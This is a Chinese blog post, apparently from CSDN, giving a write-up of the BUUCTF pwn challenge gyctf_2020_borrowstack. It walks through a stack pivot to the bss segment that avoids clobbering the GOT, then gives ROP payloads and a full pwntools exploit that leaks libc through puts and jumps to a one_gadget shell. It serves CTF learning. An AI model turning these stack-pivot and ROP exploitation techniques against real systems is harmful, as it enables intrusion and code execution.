栈帧劫持的一些利用方法及注意事项--buuctf--gyctf_2020_borrowstack

最新推荐文章于 2024-09-09 19:40:26 发布
最新推荐文章于 2024-09-09 19:40:26 发布
阅读量601 收藏 3
点赞数
分类专栏: 栈溢出 pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/107055796
版权

前言

最近在刷buuctf时发现了很多栈帧劫持的题目,从中取出最有代表性的、坑最多的拿出来写一篇博客记录一下。

保护机制

在这里插入图片描述
64位Linux程序,只开了NX保护。

解题思路

IDA看伪代码

在这里插入图片描述

伪代码分析

从代码中我们可以看到,read读入buf的字节大小只多了0x10,这样是不能构成ROP链的,但是我们发现,程序下面给了我们一个bank的bss段的地址,这不就是典型的劫持栈帧到bss段吗?
但是这里有一个坑:
在这里插入图片描述
我们可以看到got.plt距离bss段非常近,而bank又正好是在0x601080的位置,当我们把栈帧劫持到bss段时,如果我们劫持到bank的位置上,就非常有可能覆盖掉程序本身就有的got.plt表中,这样的话程序就难以运行下去。

构造ROP链

既然我们知道了这点,我们就要想办法绕过他。我们可以通过抬高我们栈来绕过这一点。在这里,我们可以把栈帧劫持到bank+0x48也就是0x6010b8的位置。这样,就算栈帧初始化,也不会覆盖到got.plt表中的数据。

p.recvuntil('want')
payload = 'a' * 0x60 + p64(0x6010c0) + p64(0x400699)
sleep(0.5)
p.send(payload)

接下来我们来构造写入bank的ROP链,这里有两种写法,一种是一步到位直接获得shell,另一种是分步走,然后获取shell的方法,第二种相对容易一点。

一步到位–使用通用寄存器

payload = p64(0x6010b8) + p64(0) * 0x8 + p64(prdi) + p64(puts_got)
payload += p64(puts_plt) + p64(pop6) + p64(0)  + p64(1) + p64(read_got)
payload += p64(0x100) + p64(0x6010c0) + p64(0) + p64(mov_call) + p64(0) * 0x2
payload += p64(0x6010b8) + p64(0) * 0x4 + p64(0x400699)

使用通用寄存器的作用呢就是可以同时写puts和read,这样其实是手动清除了栈内的参数,使得read可以在puts的栈内建立新的栈,这样就少一些步骤。

分布走–劫持栈帧最后返回read函数处构造方式

read_bss=0x400680
payload='a'*0x60+p64(pop_rdi_ret)+p64(e.got['puts'])+p64(e.plt['puts'])+p64(pop_rbp_ret)+p64(bss_start+0x60-8)+p64(read_bss)
payload1='a'*0x60+p64(one_gadget)

这个思路呢是我做题之后在其他的地方看到别的大佬写的writeup,觉得思路非常好,这里分享一下,传送门

完整exp

#! /usr/bin/env python 
from pwn import *

p = process('./gyctf_2020_borrowstack')
#p = remote('node3.buuoj.cn', 25192)
elf = ELF('./gyctf_2020_borrowstack')
libc = ELF('./libc.so.6')

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
read_plt = elf.plt['read']
read_got = elf.got['read']

mov_call = 0x4006e0
pop6 = 0x4006fa
prdi = 0x400703

p.recvuntil('want')
payload = 'a' * 0x60 + p64(0x6010c0) + p64(0x400699)
sleep(0.5)
#gdb.attach(p)
p.send(payload)

payload = p64(0x6010b8) + p64(0) * 0x8 + p64(prdi) + p64(puts_got)
payload += p64(puts_plt) + p64(pop6) + p64(0)  + p64(1) + p64(read_got)
payload += p64(0x100) + p64(0x6010c0) + p64(0) + p64(mov_call) + p64(0) * 0x2
payload += p64(0x6010b8) + p64(0) * 0x4 + p64(0x400699)
p.recvuntil('now!')
sleep(0.5)
p.send(payload)
puts = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
libc_base = puts - libc.sym['puts']
onegadget = libc_base + 0xf1147
payload = p64(onegadget)
p.send(payload)
p.interactive()
PLpa、
关注
专栏目录
BUUCTF gyctf_2020_borrowstack
BengDouLove的博客
04-22 845
第一个read的只能溢出0x10字节,也就是刚好覆盖返回地址,如果要ROP地方肯定不够 所以栈迁移到bank,在那里ROP 之前没遇到过这样的题,怎么迁过去我苦思冥想,最终还是看了wp,,用两个leave来控制rsp和rbp寄存器,太妙了 leave是个伪代码,,分解开就是 mov rsp,rbp pop rbp 如果把栈构造成这样 ‘A’ * 0x60 bank_addr leave_...
[BUUCTF]PWN——gyctf_2020_borrowstack
mcmuyanga的博客
11-17 1573
gyctf_2020_borrowstack 附件 步骤: 例行检查,64位程序,开启NX保护 本地运行一下程序,看看大概的情况 64位ida载入,直接从main函数开始看程序, buf可以溢出0x10字节,只能够覆盖到ret,参数bank在bss段上,所以打算在buf处利用leave指令去劫持栈,让它跳转去bank处,往bank里写入我们的ret2libc的攻击链去获取shell 随便找个leave指令的地址,leave=0x400699 bank在bss段上的地址 设置rdi寄存器的指令地
PWN · 栈溢出 | GOT劫持】[2024 · 长城杯]consumption
最新发布
Mr_Fmnwon的博客
09-09 425
本题主要是套壳了Cjson,实则是约定了输入格式。通过仔细代码审计,即可找到栈溢出,并实现利用
gyctf_2020_borrowstack
m0_57754423的博客
02-13 419
这道题就是常规的栈迁移,但是有坑,bank距离got表的位置比较近,这样在puts函数开辟栈帧的时候,很可能会覆盖到got表,导致无法正常执行。 我们可以使用足够多的ret指令来抬高rsp的位置,防止开辟栈帧时,覆盖到got表。 exp: from pwn import * p = process("./gy") # p =remote("node4.buuoj.cn",27630) context.log_level = "debug" e = ELF('/home/amazh/Desktop/b
pwngyctf_2020_borrowstack
Nothing
03-02 1666
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
BUUCTF-PWN gyctf_2020_bfnote(劫持TLS结构,ret2_dl_runtime_resolve)
weixin_44145820的博客
04-19 1675
目录程序分析背景知识延迟绑定Canary漏洞利用Exp 程序分析 一道带有canary的栈溢出题目 main函数是吧ebp-4中存放地址再减四获得的 调试结果如下 背景知识 延迟绑定 本题需要利用ret2al_runtime_resolve,涉及到延迟绑定的技术,简单介绍一下函数绑定的过程,以atol的调用为例 我们看一下第一次调用程序atol,此时atol_got存放着atol@plt+6...
XSS利用与挖掘-_更新版.rar_Exploit_XSS_XSS 利用_pkav_web exploit
09-23
本文将详细讲解XSS的利用方法以及挖掘技巧,基于"XSS利用与挖掘-_更新版.pptx"这份资料,我们将深入探讨这一主题。** 首先,我们需要理解XSS的三种主要类型:反射型XSS、存储型XSS和DOM型XSS。 1. **反射型XSS**:...
Cortex-M_逆向分析与安全.pdf
08-11
Cortex-M 作为一个高性能的 MCU,具有很高的处理能力,但同时也存在着漏洞,可以被攻击者所利用。 四、嵌入式系统的防护 为了防止 Cortex-M 系统中的漏洞,可以采取以下措施: * 协议弱加密或无加密,可以被伪造 ...
信息安全_数据安全_BAD_ASN_-_A_BGP_Hijack_Research.pdf
08-21
4. **检测BAD ASN的方法**:通过收集和分析ASN及BGP数据,监控IP前缀和上下流变化,识别异常宣告,例如同一ASN下短时间内宣告和撤销的前缀,以及不同地理位置宣告的前缀。 5. **BAD ASN的意图**:BAD ASN常被用作...
[系统安全] 二十二.PE数字签名之(下)微软证书漏洞CVE-2020-0601复现及Windows验证机制分析
热门推荐
杨秀璋的专栏
02-17 1万+
作者前文介绍了什么是数字签名,利用Asn1View、PEVie、010Editor等工具进行数据提取和分析,这是全网非常新的一篇文章,希望对您有所帮助。这篇文章将详细介绍微软证书漏洞CVE-2020-0601,并讲解ECC算法、Windows验证机制,复现可执行文件签名证书的例子。 这些基础性知识不仅和系统安全相关,同样与我们身边常用的软件、文档、操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参
GYCTF 2020-borrowstack
Eagle_hwei的博客
03-12 1094
borrowstack的题目分析 2020-03-1210:46:10 by hawkJW 题目附件、ida文件及wp链接   这道题的漏洞很明显,思路也比较明显,但就是有坑!!!学习一下 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所示 除了栈上不可以执行以外,其余的保护措施基本没有开启,因此该程序的保护措施还是比较松的。 下面我们来粗略的浏览一下...
[BUUCTF-pwn]——gyctf_2020_borrowstack
Y_peak的博客
03-18 328
[BUUCTF-pwn]——gyctf_2020_borrowstack exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',28602) #p = process('./gyctf_2020_borrowstack') elf = ELF('./gyctf_2020_borrowstack') #libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') #g
[Black Watch 入群题]PWN劫持利用
半岛铁盒的博客
08-17 376
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输入的参数s,那边我们可以写入很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输入,利用劫持,把程序的执行流程劫持到第一次输入的位置就可以了 站劫持利用 做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
实现Vue2+Element-UI侧边栏动态展开与收缩功能源码解析
本文将详细介绍如何利用Vue2和Element-UI的组件库实现el-aside侧边栏的收缩和展开效果。" 在前端开发中,Vue.js是一个非常流行的JavaScript框架,它以数据驱动和组件化的思想设计,能够帮助开发者快速构建用户界面...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值